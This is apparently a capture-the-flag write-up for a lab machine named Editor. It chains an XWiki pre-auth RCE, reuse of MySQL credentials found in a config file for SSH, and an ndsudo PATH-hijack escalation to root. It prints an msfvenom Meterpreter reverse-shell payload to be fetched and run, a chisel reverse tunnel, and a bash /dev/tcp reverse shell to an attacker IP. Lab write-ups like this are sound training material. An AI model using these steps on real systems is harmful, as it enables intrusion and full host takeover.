Editor

Initial machine information

Services may take up to 5 minutes to load.

Overview

Editor is a Linux machine running XWiki 15.10.8, which is vulnerable to a pre-authentication remote code execution vulnerability (CVE-2025-24893). After gaining a shell, MySQL credentials in the XWiki hibernate config reuse for SSH access as the oliver user. Privilege escalation abuses a netdata group membership and the ndsudo binary's PATH vulnerability (CVE-2024-32019) to achieve a root shell.

Recon

Nmap

sudo nmap -sC -sV -vv -oA tcp 10.129.34.144 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.34.144

Port 80 resolves to a named host. Discovery reveals wiki.editor.htb hosting XWiki:

XWiki Debian 15.10.8

Add wiki.editor.htb and editor.htb to /etc/hosts.

Foothold

CVE-2025-24893 - XWiki RCE

XWiki 15.10.8 is vulnerable to CVE-2025-24893, a pre-authentication remote code execution vulnerability. The PoC is available at:

https://github.com/gunzf0x/CVE-2025-24893

Run the PoC against the target to obtain an initial shell.

Upgrade to Meterpreter

Upgrade the basic shell to a more stable Meterpreter session. Generate a Linux x64 Meterpreter ELF and serve it:

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=tun0 lport=8443 -f elf -o ekg02
sudo python3 -m http.server 80

Fetch and execute from the XWiki shell, then catch the Meterpreter callback.

Credential Discovery - Hibernate Config

While Meterpreter runs, also execute linpeas for thorough enumeration. The XWiki hibernate configuration file contains MySQL credentials:

Path: /usr/lib/xwiki-jetty/webapps/xwiki/WEB-INF/hibernate.cfg.xml

The MySQL password reuses as the SSH password for the oliver user. Test it:

ssh [email protected]

It works. User flag is accessible from oliver's home directory.

Privilege Escalation

netdata Group Membership

Oliver is a member of the netdata group:

id
# uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),1001(netdata)

Netdata (a performance monitoring tool) runs a web interface on port 19999. As a netdata group member, Oliver has access to the netdata installation files and the ndsudo binary.

Port Forward via Chisel

Port 19999 is only accessible locally. Forward it to the attacking machine using chisel:

# On attacker
./chisel server -p 9001 --reverse
 
# On target
./chisel client 10.10.14.X:9001 R:19999:localhost:19999

Browse http://localhost:19999 to access the Netdata web interface.

CVE-2024-32019 - ndsudo PATH Hijack

The ndsudo binary (part of Netdata) is vulnerable to CVE-2024-32019 - a PATH environment variable injection that allows privilege escalation because ndsudo executes commands without sanitising the PATH.

Reference: https://github.com/dollarboysushil/CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation

Create a malicious binary with the same name as a command that ndsudo calls, place it at the front of the PATH, and execute ndsudo:

# Create a malicious binary (e.g., named after whatever ndsudo calls)
echo '#!/bin/bash\n/bin/bash -i >& /dev/tcp/10.10.14.X/8443 0>&1' > /tmp/malicious
chmod +x /tmp/malicious
 
# Place it in PATH before the real binary
export PATH=/tmp:$PATH
 
# Execute ndsudo to trigger the hijack
ndsudo <command>

This yields a root shell.

Attack Chain Summary